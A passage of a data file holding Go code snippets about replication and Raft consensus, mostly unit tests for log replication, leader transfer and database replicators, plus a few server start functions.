storagemock.NewMockWriteServiceClient(ctl)\n\tmockServiceClient.EXPECT().Next(gomock.Any(), gomock.Any()).Return(&storage.NextSeqResponse{\n\t\tSeq: 5,\n\t}, nil)\n\tmockServiceClient.EXPECT().Next(gomock.Any(), gomock.Any()).Return(&storage.NextSeqResponse{\n\t\tSeq: 7,\n\t}, nil)\n\n\tdone1 := make(chan struct{})\n\tdone2 := make(chan struct{})\n\tmockClientStream := storagemock.NewMockWriteService_WriteClient(ctl)\n\tmockClientStream.EXPECT().Recv().DoAndReturn(func() (*storage.WriteResponse, error) {\n\t\t<-done1\n\t\ttime.Sleep(10 * time.Millisecond)\n\t\treturn nil, errors.New(\"stream canceled\")\n\t})\n\n\t// replica 5~15\n\twr1, _ := buildWriteRequest(5, 15)\n\tmockClientStream.EXPECT().Send(wr1).DoAndReturn(func(_ *storage.WriteRequest) error {\n\t\t// notify recv loop to re-connect\n\t\tclose(done1)\n\t\treturn errors.New(\"seq not match\")\n\t})\n\n\tmockClientStream.EXPECT().Recv().DoAndReturn(func() (*storage.WriteResponse, error) {\n\t\t<-done2\n\t\treturn nil, errors.New(\"stream canceled\")\n\t})\n\n\t// replica 7 ~ 15\n\twr2, _ := buildWriteRequest(7, 15)\n\tmockClientStream.EXPECT().Send(wr2).Return(nil)\n\n\tmockFct := rpc.NewMockClientStreamFactory(ctl)\n\t// first time\n\tmockFct.EXPECT().CreateWriteServiceClient(node).Return(mockServiceClient, nil)\n\tmockFct.EXPECT().LogicNode().Return(node)\n\tmockFct.EXPECT().CreateWriteClient(database, shardID, node).Return(mockClientStream, nil)\n\t// second time\n\tmockFct.EXPECT().CreateWriteServiceClient(node).Return(mockServiceClient, nil)\n\tmockFct.EXPECT().LogicNode().Return(node)\n\tmockFct.EXPECT().CreateWriteClient(database, shardID, node).Return(mockClientStream, nil)\n\n\tmockFanOut := queue.NewMockFanOut(ctl)\n\tmockFanOut.EXPECT().SetHeadSeq(int64(5)).Return(nil)\n\tmockFanOut.EXPECT().SetHeadSeq(int64(7)).Return(nil)\n\t// first time\n\tfor i := 5; i < 15; i++ {\n\t\tmockFanOut.EXPECT().Consume().Return(int64(i))\n\t\tmockFanOut.EXPECT().Get(int64(i)).Return(buildMessageBytes(i), nil)\n\t}\n\n\t// second time\n\tfor i := 7; i < 15; i++ {\n\t\tmockFanOut.EXPECT().Consume().Return(int64(i))\n\t\tmockFanOut.EXPECT().Get(int64(i)).Return(buildMessageBytes(i), nil)\n\t}\n\tmockFanOut.EXPECT().Consume().Return(queue.SeqNoNewMessageAvailable).AnyTimes()\n\n\trep := newReplicator(node, database, shardID, mockFanOut, mockFct)\n\n\ttime.Sleep(time.Second * 4)\n\trep.Stop()\n\tclose(done2)\n}", "func TestFollowerAppendEntries(t *testing.T) {\n\ttests := []struct {\n\t\tindex, term uint64\n\t\tents []pb.Entry\n\t\twents []pb.Entry\n\t\twunstable []pb.Entry\n\t}{\n\t\t{\n\t\t\t2, 2,\n\t\t\t[]pb.Entry{{Term: 3, Index: 3}},\n\t\t\t[]pb.Entry{{Term: 1, Index: 1}, {Term: 2, Index: 2}, {Term: 3, Index: 3}},\n\t\t\t[]pb.Entry{{Term: 3, Index: 3}},\n\t\t},\n\t\t{\n\t\t\t1, 1,\n\t\t\t[]pb.Entry{{Term: 3, Index: 2}, {Term: 4, Index: 3}},\n\t\t\t[]pb.Entry{{Term: 1, Index: 1}, {Term: 3, Index: 2}, {Term: 4, Index: 3}},\n\t\t\t[]pb.Entry{{Term: 3, Index: 2}, {Term: 4, Index: 3}},\n\t\t},\n\t\t{\n\t\t\t0, 0,\n\t\t\t[]pb.Entry{{Term: 1, Index: 1}},\n\t\t\t[]pb.Entry{{Term: 1, Index: 1}, {Term: 2, Index: 2}},\n\t\t\tnil,\n\t\t},\n\t\t{\n\t\t\t0, 0,\n\t\t\t[]pb.Entry{{Term: 3, Index: 1}},\n\t\t\t[]pb.Entry{{Term: 3, Index: 1}},\n\t\t\t[]pb.Entry{{Term: 3, Index: 1}},\n\t\t},\n\t}\n\tfor i, tt := range tests {\n\t\tstorage := NewMemoryStorage()\n\t\tstorage.Append([]pb.Entry{{Term: 1, Index: 1}, {Term: 2, Index: 2}})\n\t\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, storage)\n\t\tdefer closeAndFreeRaft(r)\n\t\tr.becomeFollower(2, 2)\n\n\t\tr.Step(pb.Message{From: 2, To: 1, Type: pb.MsgApp, Term: 2, LogTerm: tt.term, Index: tt.index, Entries: tt.ents})\n\n\t\tif g := r.raftLog.allEntries(); !reflect.DeepEqual(g, tt.wents) {\n\t\t\tt.Errorf(\"#%d: ents = %+v, want %+v\", i, g, tt.wents)\n\t\t}\n\t\tif g := r.raftLog.unstableEntries(); !reflect.DeepEqual(g, tt.wunstable) {\n\t\t\tt.Errorf(\"#%d: unstableEnts = %+v, want %+v\", i, g, tt.wunstable)\n\t\t}\n\t}\n}", "func TestLeaderTransferToUpToDateNodeFromFollower(t *testing.T) {\n\tnt := newNetwork(nil, nil, nil)\n\tdefer nt.closeAll()\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tlead := nt.peers[1].(*raft)\n\n\tif lead.lead != 1 {\n\t\tt.Fatalf(\"after election leader is %x, want 1\", lead.lead)\n\t}\n\n\t// Transfer leadership to 2.\n\tnt.send(pb.Message{From: 2, To: 2, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateFollower, 2)\n\n\t// After some log replication, transfer leadership back to 1.\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{}}})\n\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateLeader, 1)\n}", "func (rplx *Rplx) StartReplicationServer(ln net.Listener, grpcOptions ...grpc.ServerOption) error {\n\tif rplx.withMetrics {\n\t\tgrpcOptions = append(grpcOptions, grpc.StreamInterceptor(grpc_prometheus.StreamServerInterceptor))\n\t\tgrpcOptions = append(grpcOptions, grpc.UnaryInterceptor(grpc_prometheus.UnaryServerInterceptor))\n\t}\n\n\trplx.grpcServer = grpc.NewServer(grpcOptions...)\n\n\tRegisterReplicatorServer(rplx.grpcServer, rplx)\n\treflection.Register(rplx.grpcServer)\n\n\tif rplx.withMetrics {\n\t\tgrpc_prometheus.Register(rplx.grpcServer)\n\t}\n\n\trplx.logger.Debug(\"start grpc server\", zap.String(\"address\", ln.Addr().String()))\n\n\treturn rplx.grpcServer.Serve(ln)\n}", "func (rf *Raft) Start(command interface{}) (int, int, bool) {\n index := -1\n term := -1\n isLeader := true\n\n rf.mu.Lock()\n isLeader = rf.state == \"Leader\"\n if isLeader {\n newEntry := Entry{}\n newEntry.Command = command\n newEntry.Term = rf.currentTerm\n\n index = rf.convertToGlobalViewIndex(len(rf.log))\n term = rf.currentTerm\n rf.log = append(rf.log, newEntry)\n\n rf.persist()\n //go rf.startAppendEntries()\n\n DLCPrintf(\"Leader (%d) append entries and now log is from %v to %v(index=%d in Raft Log view)\", rf.me, rf.log[1], rf.log[len(rf.log)-1], len(rf.log)-1)\n }\n rf.mu.Unlock()\n\n return index, term, isLeader\n}", "func TestLeaderTransferWithCheckQuorum(t *testing.T) {\n\tnt := newNetwork(nil, nil, nil)\n\tdefer nt.closeAll()\n\tfor i := 1; i < 4; i++ {\n\t\tr := nt.peers[uint64(i)].(*raft)\n\t\tr.checkQuorum = true\n\t\tsetRandomizedElectionTimeout(r, r.electionTimeout+i)\n\t}\n\n\t// Letting peer 2 electionElapsed reach to timeout so that it can vote for peer 1\n\tf := nt.peers[2].(*raft)\n\tfor i := 0; i < f.electionTimeout; i++ {\n\t\tf.tick()\n\t}\n\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tlead := nt.peers[1].(*raft)\n\n\tif lead.lead != 1 {\n\t\tt.Fatalf(\"after election leader is %x, want 1\", lead.lead)\n\t}\n\n\t// Transfer leadership to 2.\n\tnt.send(pb.Message{From: 2, To: 1, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateFollower, 2)\n\n\t// After some log replication, transfer leadership back to 1.\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{}}})\n\n\tnt.send(pb.Message{From: 1, To: 2, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateLeader, 1)\n}", "func TestUnderscorePrefixSupport(t *testing.T) {\n\tbase.RequireNumTestBuckets(t, 2)\n\n\t// Passive //\n\tpassiveRT := NewRestTester(t, nil)\n\tdefer passiveRT.Close()\n\n\t// Make passive RT listen on an actual HTTP port, so it can receive the blipsync request from the active replicator\n\tsrv := httptest.NewServer(passiveRT.TestAdminHandler())\n\tdefer srv.Close()\n\n\t// Active //\n\tactiveRT := NewRestTester(t, nil)\n\tdefer activeRT.Close()\n\n\t// Create the document\n\tdocID := t.Name()\n\trawDoc := `{\"_foo\": true, \"_exp\": 120, \"true\": false, \"_attachments\": {\"bar\": {\"data\": \"Zm9vYmFy\"}}}`\n\t_ = activeRT.putDoc(docID, rawDoc)\n\n\t// Set-up replicator\n\tpassiveDBURL, err := url.Parse(srv.URL + \"/db\")\n\trequire.NoError(t, err)\n\n\tar := db.NewActiveReplicator(&db.ActiveReplicatorConfig{\n\t\tID: t.Name(),\n\t\tDirection: db.ActiveReplicatorTypePush,\n\t\tRemoteDBURL: passiveDBURL,\n\t\tActiveDB: &db.Database{\n\t\t\tDatabaseContext: activeRT.GetDatabase(),\n\t\t},\n\t\tContinuous: true,\n\t\tChangesBatchSize: 200,\n\t\tReplicationStatsMap: base.SyncGatewayStats.NewDBStats(t.Name(), false, false, false).DBReplicatorStats(t.Name()),\n\t\tPurgeOnRemoval: false,\n\t})\n\tdefer func() { require.NoError(t, ar.Stop()) }()\n\n\trequire.NoError(t, ar.Start())\n\tactiveRT.waitForReplicationStatus(ar.ID, db.ReplicationStateRunning)\n\n\t// Confirm document is replicated\n\tchangesResults, err := passiveRT.WaitForChanges(1, \"/db/_changes?since=0\", \"\", true)\n\tassert.NoError(t, err)\n\tassert.Len(t, changesResults.Results, 1)\n\n\terr = passiveRT.WaitForPendingChanges()\n\trequire.NoError(t, err)\n\n\trequire.NoError(t, ar.Stop())\n\n\t// Assert document was replicated successfully\n\tdoc := passiveRT.getDoc(docID)\n\tassert.EqualValues(t, true, doc[\"_foo\"]) // Confirm user defined value got created\n\tassert.EqualValues(t, nil, doc[\"_exp\"]) // Confirm expiry was consumed\n\tassert.EqualValues(t, false, doc[\"true\"]) // Sanity check normal keys\n\t// Confirm attachment was created successfully\n\tresp := passiveRT.SendAdminRequest(\"GET\", \"/db/\"+t.Name()+\"/bar\", \"\")\n\tassertStatus(t, resp, 200)\n\n\t// Edit existing document\n\trev := doc[\"_rev\"]\n\trequire.NotNil(t, rev)\n\trawDoc = fmt.Sprintf(`{\"_rev\": \"%s\",\"_foo\": false, \"test\": true}`, rev)\n\t_ = activeRT.putDoc(docID, rawDoc)\n\n\t// Replicate modified document\n\trequire.NoError(t, ar.Start())\n\tactiveRT.waitForReplicationStatus(ar.ID, db.ReplicationStateRunning)\n\n\tchangesResults, err = passiveRT.WaitForChanges(1, fmt.Sprintf(\"/db/_changes?since=%v\", changesResults.Last_Seq), \"\", true)\n\tassert.NoError(t, err)\n\tassert.Len(t, changesResults.Results, 1)\n\n\terr = passiveRT.WaitForPendingChanges()\n\trequire.NoError(t, err)\n\n\t// Verify document replicated successfully\n\tdoc = passiveRT.getDoc(docID)\n\tassert.NotEqualValues(t, doc[\"_rev\"], rev) // Confirm rev got replaced with new rev\n\tassert.EqualValues(t, false, doc[\"_foo\"]) // Confirm user defined value got created\n\tassert.EqualValues(t, true, doc[\"test\"])\n\t// Confirm attachment was removed successfully in latest revision\n\tresp = passiveRT.SendAdminRequest(\"GET\", \"/db/\"+docID+\"/bar\", \"\")\n\tassertStatus(t, resp, 404)\n\n\t// Add disallowed _removed tag in document\n\trawDoc = fmt.Sprintf(`{\"_rev\": \"%s\",\"_removed\": false}`, doc[\"_rev\"])\n\tresp = activeRT.SendAdminRequest(\"PUT\", \"/db/\"+docID, rawDoc)\n\tassertStatus(t, resp, 404)\n\n\t// Add disallowed _purged tag in document\n\trawDoc = fmt.Sprintf(`{\"_rev\": \"%s\",\"_purged\": true}`, doc[\"_rev\"])\n\tresp = activeRT.SendAdminRequest(\"PUT\", \"/db/\"+docID, rawDoc)\n\tassertStatus(t, resp, 400)\n}", "func (s) TestSuccessCaseLeafNode(t *testing.T) {\n\ttests := []struct {\n\t\tname string\n\t\tclusterName string\n\t\tclusterUpdate xdsresource.ClusterUpdate\n\t\tlbPolicy *xdsresource.ClusterLBPolicyRingHash\n\t}{\n\t\t{\n\t\t\tname: \"test-update-root-cluster-EDS-success\",\n\t\t\tclusterName: edsService,\n\t\t\tclusterUpdate: xdsresource.ClusterUpdate{\n\t\t\t\tClusterType: xdsresource.ClusterTypeEDS,\n\t\t\t\tClusterName: edsService,\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tname: \"test-update-root-cluster-EDS-with-ring-hash\",\n\t\t\tclusterName: logicalDNSService,\n\t\t\tclusterUpdate: xdsresource.ClusterUpdate{\n\t\t\t\tClusterType: xdsresource.ClusterTypeLogicalDNS,\n\t\t\t\tClusterName: logicalDNSService,\n\t\t\t\tLBPolicy: &xdsresource.ClusterLBPolicyRingHash{MinimumRingSize: 10, MaximumRingSize: 100},\n\t\t\t},\n\t\t\tlbPolicy: &xdsresource.ClusterLBPolicyRingHash{MinimumRingSize: 10, MaximumRingSize: 100},\n\t\t},\n\t\t{\n\t\t\tname: \"test-update-root-cluster-Logical-DNS-success\",\n\t\t\tclusterName: logicalDNSService,\n\t\t\tclusterUpdate: xdsresource.ClusterUpdate{\n\t\t\t\tClusterType: xdsresource.ClusterTypeLogicalDNS,\n\t\t\t\tClusterName: logicalDNSService,\n\t\t\t},\n\t\t},\n\t}\n\n\tfor _, test := range tests {\n\t\tt.Run(test.name, func(t *testing.T) {\n\t\t\tch, fakeClient := setupTests()\n\t\t\t// When you first update the root cluster, it should hit the code\n\t\t\t// path which will start a cluster node for that root. Updating the\n\t\t\t// root cluster logically represents a ping from a ClientConn.\n\t\t\tch.updateRootCluster(test.clusterName)\n\t\t\t// Starting a cluster node involves communicating with the\n\t\t\t// xdsClient, telling it to watch a cluster.\n\t\t\tctx, ctxCancel := context.WithTimeout(context.Background(), defaultTestTimeout)\n\t\t\tdefer ctxCancel()\n\t\t\tgotCluster, err := fakeClient.WaitForWatchCluster(ctx)\n\t\t\tif err != nil {\n\t\t\t\tt.Fatalf(\"xdsClient.WatchCDS failed with error: %v\", err)\n\t\t\t}\n\t\t\tif gotCluster != test.clusterName {\n\t\t\t\tt.Fatalf(\"xdsClient.WatchCDS called for cluster: %v, want: %v\", gotCluster, test.clusterName)\n\t\t\t}\n\t\t\t// Invoke callback with xds client with a certain clusterUpdate. Due\n\t\t\t// to this cluster update filling out the whole cluster tree, as the\n\t\t\t// cluster is of a root type (EDS or Logical DNS) and not an\n\t\t\t// aggregate cluster, this should trigger the ClusterHandler to\n\t\t\t// write to the update buffer to update the CDS policy.\n\t\t\tfakeClient.InvokeWatchClusterCallback(test.clusterUpdate, nil)\n\t\t\tselect {\n\t\t\tcase chu := <-ch.updateChannel:\n\t\t\t\tif diff := cmp.Diff(chu.updates, []xdsresource.ClusterUpdate{test.clusterUpdate}); diff != \"\" {\n\t\t\t\t\tt.Fatalf(\"got unexpected cluster update, diff (-got, +want): %v\", diff)\n\t\t\t\t}\n\t\t\t\tif diff := cmp.Diff(chu.lbPolicy, test.lbPolicy); diff != \"\" {\n\t\t\t\t\tt.Fatalf(\"got unexpected lb policy in cluster update, diff (-got, +want): %v\", diff)\n\t\t\t\t}\n\t\t\tcase <-ctx.Done():\n\t\t\t\tt.Fatal(\"Timed out waiting for update from update channel.\")\n\t\t\t}\n\t\t\t// Close the clusterHandler. This is meant to be called when the CDS\n\t\t\t// Balancer is closed, and the call should cancel the watch for this\n\t\t\t// cluster.\n\t\t\tch.close()\n\t\t\tclusterNameDeleted, err := fakeClient.WaitForCancelClusterWatch(ctx)\n\t\t\tif err != nil {\n\t\t\t\tt.Fatalf(\"xdsClient.CancelCDS failed with error: %v\", err)\n\t\t\t}\n\t\t\tif clusterNameDeleted != test.clusterName {\n\t\t\t\tt.Fatalf(\"xdsClient.CancelCDS called for cluster %v, want: %v\", clusterNameDeleted, logicalDNSService)\n\t\t\t}\n\t\t})\n\t}\n}", "func (rf *Raft) Start(command interface{}) (int, int, bool) {\n\trf.mu.Lock()\n\tindex := 1\n\tll, exists := rf.lastLog()\n\tif exists {\n\t\tindex = ll.Index + 1\n\t}\n\n\tterm := rf.currentTerm\n\tisLeader := rf.currentRole == Leader\n\n\tif !isLeader {\n\t\trf.mu.Unlock()\n\t\treturn index, term, false\n\t}\n\tlogEntry := LogEntry{\n\t\tIndex: index,\n\t\tTerm: term,\n\t\tCommand: command,\n\t}\n\trf.Debug(dCommit, \"starting agreement for new log entry:%v\", logEntry)\n\trf.logs = append(rf.logs, logEntry)\n\trf.persist()\n\trf.mu.Unlock()\n\n\trf.sendEntries()\n\n\treturn index, term, true\n}", "func TestActiveReplicatorPullFromCheckpointIgnored(t *testing.T) {\n\n\tbase.RequireNumTestBuckets(t, 2)\n\n\tbase.SetUpTestLogging(t, logger.LevelDebug, logger.KeyReplicate, logger.KeyHTTP, logger.KeyHTTPResp, logger.KeySync, logger.KeySyncMsg)\n\n\tconst (\n\t\tchangesBatchSize = 10\n\t\tnumRT2DocsInitial = 13 // 2 batches of changes\n\t\tnumRT2DocsTotal = 24 // 2 more batches\n\t)\n\n\t// Passive\n\ttb2 := base.GetTestBucket(t)\n\trt2 := NewRestTester(t, &RestTesterConfig{\n\t\tTestBucket: tb2,\n\t\tDatabaseConfig: &DatabaseConfig{DbConfig: DbConfig{\n\t\t\tUsers: map[string]*db.PrincipalConfig{\n\t\t\t\t\"alice\": {\n\t\t\t\t\tPassword: base.StringPtr(\"pass\"),\n\t\t\t\t\tExplicitChannels: utils.SetOf(\"alice\"),\n\t\t\t\t},\n\t\t\t},\n\t\t}},\n\t})\n\tdefer rt2.Close()\n\n\t// Active\n\ttb1 := base.GetTestBucket(t)\n\trt1 := NewRestTester(t, &RestTesterConfig{\n\t\tTestBucket: tb1,\n\t})\n\tdefer rt1.Close()\n\n\t// Create first batch of docs\n\tdocIDPrefix := t.Name() + \"doc\"\n\tfor i := 0; i < numRT2DocsInitial; i++ {\n\t\tresp := rt1.SendAdminRequest(http.MethodPut, fmt.Sprintf(\"/db/%s%d\", docIDPrefix, i), `{\"channels\":[\"alice\"]}`)\n\t\tassertStatus(t, resp, http.StatusCreated)\n\t\trt1RevID := respRevID(t, resp)\n\t\tresp = rt2.SendAdminRequest(http.MethodPut, fmt.Sprintf(\"/db/%s%d\", docIDPrefix, i), `{\"channels\":[\"alice\"]}`)\n\t\tassertStatus(t, resp, http.StatusCreated)\n\t\trt2RevID := respRevID(t, resp)\n\t\trequire.Equal(t, rt1RevID, rt2RevID)\n\t}\n\n\t// Make rt2 listen on an actual HTTP port, so it can receive the blipsync request from rt1\n\tsrv := httptest.NewServer(rt2.TestPublicHandler())\n\tdefer srv.Close()\n\n\t// Build passiveDBURL with basic auth creds\n\tpassiveDBURL, err := url.Parse(srv.URL + \"/db\")\n\trequire.NoError(t, err)\n\tpassiveDBURL.User = url.UserPassword(\"alice\", \"pass\")\n\n\tarConfig := db.ActiveReplicatorConfig{\n\t\tID: t.Name(),\n\t\tDirection: db.ActiveReplicatorTypePull,\n\t\tRemoteDBURL: passiveDBURL,\n\t\tActiveDB: &db.Database{\n\t\t\tDatabaseContext: rt1.GetDatabase(),\n\t\t},\n\t\tContinuous: true,\n\t\tChangesBatchSize: changesBatchSize,\n\t\tReplicationStatsMap: base.SyncGatewayStats.NewDBStats(t.Name(), false, false, false).DBReplicatorStats(t.Name()),\n\t}\n\n\t// Create the first active replicator to pull from seq:0\n\tar := db.NewActiveReplicator(&arConfig)\n\n\tstartNumChangesRequestedFromZeroTotal := rt2.GetDatabase().DbStats.CBLReplicationPull().NumPullReplSinceZero.Value()\n\n\tassert.NoError(t, ar.Start())\n\n\t_, ok := base.WaitForStat(func() int64 {\n\t\treturn ar.Pull.Checkpointer.Stats().AlreadyKnownSequenceCount\n\t}, numRT2DocsInitial)\n\tassert.True(t, ok)\n\n\t// wait for all of the documents originally written to rt2 to arrive at rt1\n\tchangesResults, err := rt1.WaitForChanges(numRT2DocsInitial, \"/db/_changes?since=0\", \"\", true)\n\trequire.NoError(t, err)\n\trequire.Len(t, changesResults.Results, numRT2DocsInitial)\n\tdocIDsSeen := make(map[string]bool, numRT2DocsInitial)\n\tfor _, result := range changesResults.Results {\n\t\tdocIDsSeen[result.ID] = true\n\t}\n\tfor i := 0; i < numRT2DocsInitial; i++ {\n\t\tdocID := fmt.Sprintf(\"%s%d\", docIDPrefix, i)\n\t\tassert.True(t, docIDsSeen[docID])\n\n\t\t_, err := rt1.GetDatabase().GetDocument(logger.TestCtx(t), docID, db.DocUnmarshalAll)\n\t\tassert.NoError(t, err)\n\t}\n\n\t// one _changes from seq:0 with initial number of docs sent\n\tnumChangesRequestedFromZeroTotal := rt2.GetDatabase().DbStats.CBLReplicationPull().NumPullReplSinceZero.Value()\n\tassert.Equal(t, startNumChangesRequestedFromZeroTotal+1, numChangesRequestedFromZeroTotal)\n\n\t// rev assertions\n\tnumRevsSentTotal := rt2.GetDatabase().DbStats.CBLReplicationPull().RevSendCount.Value()\n\tassert.Equal(t, int64(0), numRevsSentTotal)\n\tassert.Equal(t, int64(0), ar.Pull.Checkpointer.Stats().ProcessedSequenceCount)\n\tassert.Equal(t, int64(0), ar.Pull.Checkpointer.Stats().ExpectedSequenceCount)\n\n\t// checkpoint assertions\n\tassert.Equal(t, int64(0), ar.Pull.Checkpointer.Stats().GetCheckpointHitCount)\n\tassert.Equal(t, int64(1), ar.Pull.Checkpointer.Stats().GetCheckpointMissCount)\n\t// Since we bumped the checkpointer interval, we're only setting checkpoints on replicator close.\n\tassert.Equal(t, int64(0), ar.Pull.Checkpointer.Stats().SetCheckpointCount)\n\tar.Pull.Checkpointer.CheckpointNow()\n\tassert.Equal(t, int64(1), ar.Pull.Checkpointer.Stats().SetCheckpointCount)\n\n\tassert.NoError(t, ar.Stop())\n\n\t// Second batch of docs\n\tfor i := numRT2DocsInitial; i < numRT2DocsTotal; i++ {\n\t\tresp := rt1.SendAdminRequest(http.MethodPut, fmt.Sprintf(\"/db/%s%d\", docIDPrefix, i), `{\"channels\":[\"alice\"]}`)\n\t\tassertStatus(t, resp, http.StatusCreated)\n\t\trt1RevID := respRevID(t, resp)\n\t\tresp = rt2.SendAdminRequest(http.MethodPut, fmt.Sprintf(\"/db/%s%d\", docIDPrefix, i), `{\"channels\":[\"alice\"]}`)\n\t\tassertStatus(t, resp, http.StatusCreated)\n\t\trt2RevID := respRevID(t, resp)\n\t\trequire.Equal(t, rt1RevID, rt2RevID)\n\t}\n\n\t// Create a new replicator using the same config, which should use the checkpoint set from the first.\n\tar = db.NewActiveReplicator(&arConfig)\n\tdefer func() { assert.NoError(t, ar.Stop()) }()\n\tassert.NoError(t, ar.Start())\n\n\t_, ok = base.WaitForStat(func() int64 {\n\t\treturn ar.Pull.Checkpointer.Stats().AlreadyKnownSequenceCount\n\t}, numRT2DocsTotal-numRT2DocsInitial)\n\tassert.True(t, ok)\n\n\t// Make sure we've not started any more since:0 replications on rt2 since the first one\n\tendNumChangesRequestedFromZeroTotal := rt2.GetDatabase().DbStats.CBLReplicationPull().NumPullReplSinceZero.Value()\n\tassert.Equal(t, numChangesRequestedFromZeroTotal, endNumChangesRequestedFromZeroTotal)\n\n\t// make sure rt2 thinks it has sent all of the revs via a 2.x replicator\n\tnumRevsSentTotal = rt2.GetDatabase().DbStats.CBLReplicationPull().RevSendCount.Value()\n\tassert.Equal(t, int64(0), numRevsSentTotal)\n\tassert.Equal(t, int64(0), ar.Pull.Checkpointer.Stats().ProcessedSequenceCount)\n\tassert.Equal(t, int64(0), ar.Pull.Checkpointer.Stats().ExpectedSequenceCount)\n\n\t// assert the second active replicator stats\n\tassert.Equal(t, int64(1), ar.Pull.Checkpointer.Stats().GetCheckpointHitCount)\n\tassert.Equal(t, int64(0), ar.Pull.Checkpointer.Stats().GetCheckpointMissCount)\n\tassert.Equal(t, int64(0), ar.Pull.Checkpointer.Stats().SetCheckpointCount)\n\tar.Pull.Checkpointer.CheckpointNow()\n\tassert.Equal(t, int64(1), ar.Pull.Checkpointer.Stats().SetCheckpointCount)\n}", "func TestLogRecovery(t *testing.T) {\n\tpath := setupLog(\n\t\t`cf4aab23 0000000000000001 0000000000000001 cmd_1 {\"val\":\"foo\",\"i\":20}`+\"\\n\" +\n\t\t`4c08d91f 0000000000000002 0000000000000001 cmd_2 {\"x\":100}`+\"\\n\" +\n\t\t`6ac5807c 0000000000000003 00000000000`)\n\tlog := NewLog()\n\tlog.AddCommandType(&TestCommand1{})\n\tlog.AddCommandType(&TestCommand2{})\n\tif err := log.Open(path); err != nil {\n\t\tt.Fatalf(\"Unable to open log: %v\", err)\n\t}\n\tdefer log.Close()\n\tdefer os.Remove(path)\n\n\tif err := log.Append(NewLogEntry(log, 3, 2, &TestCommand1{\"bat\", -5})); err != nil {\n\t\tt.Fatalf(\"Unable to append: %v\", err)\n\t}\n\n\t// Validate existing log entries.\n\tif len(log.entries) != 3 {\n\t\tt.Fatalf(\"Expected 2 entries, got %d\", len(log.entries))\n\t}\n\tif !reflect.DeepEqual(log.entries[0], NewLogEntry(log, 1, 1, &TestCommand1{\"foo\", 20})) {\n\t\tt.Fatalf(\"Unexpected entry[0]: %v\", log.entries[0])\n\t}\n\tif !reflect.DeepEqual(log.entries[1], NewLogEntry(log, 2, 1, &TestCommand2{100})) {\n\t\tt.Fatalf(\"Unexpected entry[1]: %v\", log.entries[1])\n\t}\n\tif !reflect.DeepEqual(log.entries[2], NewLogEntry(log, 3, 2, &TestCommand1{\"bat\", -5})) {\n\t\tt.Fatalf(\"Unexpected entry[2]: %v\", log.entries[2])\n\t}\n\n\t// Validate precommit log contents.\n\texpected :=\n\t\t`cf4aab23 0000000000000001 0000000000000001 cmd_1 {\"val\":\"foo\",\"i\":20}`+\"\\n\" +\n\t\t`4c08d91f 0000000000000002 0000000000000001 cmd_2 {\"x\":100}`+\"\\n\"\n\tactual, _ := ioutil.ReadFile(path)\n\tif string(actual) != expected {\n\t\tt.Fatalf(\"Unexpected buffer:\\nexp:\\n%s\\ngot:\\n%s\", expected, string(actual))\n\t}\n\n\t// Validate committed log contents.\n\tif err := log.SetCommitIndex(3); err != nil {\n\t\tt.Fatalf(\"Unable to partially commit: %v\", err)\n\t}\n\texpected =\n\t\t`cf4aab23 0000000000000001 0000000000000001 cmd_1 {\"val\":\"foo\",\"i\":20}`+\"\\n\" +\n\t\t`4c08d91f 0000000000000002 0000000000000001 cmd_2 {\"x\":100}`+\"\\n\" +\n\t\t`3f3f884c 0000000000000003 0000000000000002 cmd_1 {\"val\":\"bat\",\"i\":-5}`+\"\\n\"\n\tactual, _ = ioutil.ReadFile(path)\n\tif string(actual) != expected {\n\t\tt.Fatalf(\"Unexpected buffer:\\nexp:\\n%s\\ngot:\\n%s\", expected, string(actual))\n\t}\n}", "func StartServer(me string) *ObliviousReplica {\n\n or := new(ObliviousReplica)\n or.me = me\n\n rpcs := rpc.NewServer()\n rpcs.Register(or)\n\n or.UID = GetMD5Hash(me)\n os.Mkdir(\"data\", 0700)\n\n or.dataPath = \"data/replica-\" + or.UID\n os.Mkdir(or.dataPath, 0700)\n\n os.Remove(me)\n l, e := net.Listen(Network, me);\n if e != nil {\n log.Fatal(\"listen error: \", e);\n }\n or.l = l\n\n // please do not change any of the following code,\n // or do anything to subvert it.\n\n go func() {\n for or.dead == false {\n conn, err := or.l.Accept()\n if err == nil && or.dead == false {\n if or.unreliable && (rand.Int63() % 1000) < 100 {\n // discard the request.\n conn.Close()\n } else if or.unreliable && (rand.Int63() % 1000) < 200 {\n // process the request but force discard of reply.\n c1 := conn.(*net.UnixConn)\n f, _ := c1.File()\n err := syscall.Shutdown(int(f.Fd()), syscall.SHUT_WR)\n if err != nil {\n fmt.Printf(\"shutdown: %v\\n\", err)\n }\n go rpcs.ServeConn(conn)\n } else {\n go rpcs.ServeConn(conn)\n }\n } else if err == nil {\n conn.Close()\n }\n if err != nil && or.dead == false {\n fmt.Printf(\"ShardMaster(%v) accept: %v\\n\", me, err.Error())\n or.Kill()\n }\n }\n }()\n\n return or\n}", "func TestActiveReplicatorPullFromCheckpoint(t *testing.T) {\n\n\tbase.RequireNumTestBuckets(t, 2)\n\n\tbase.SetUpTestLogging(t, logger.LevelInfo, logger.KeyReplicate, logger.KeyHTTP, logger.KeyHTTPResp, logger.KeySync, logger.KeySyncMsg)\n\n\tconst (\n\t\tchangesBatchSize = 10\n\t\tnumRT2DocsInitial = 13 // 2 batches of changes\n\t\tnumRT2DocsTotal = 24 // 2 more batches\n\t)\n\n\t// Passive\n\ttb2 := base.GetTestBucket(t)\n\trt2 := NewRestTester(t, &RestTesterConfig{\n\t\tTestBucket: tb2,\n\t\tDatabaseConfig: &DatabaseConfig{DbConfig: DbConfig{\n\t\t\tUsers: map[string]*db.PrincipalConfig{\n\t\t\t\t\"alice\": {\n\t\t\t\t\tPassword: base.StringPtr(\"pass\"),\n\t\t\t\t\tExplicitChannels: 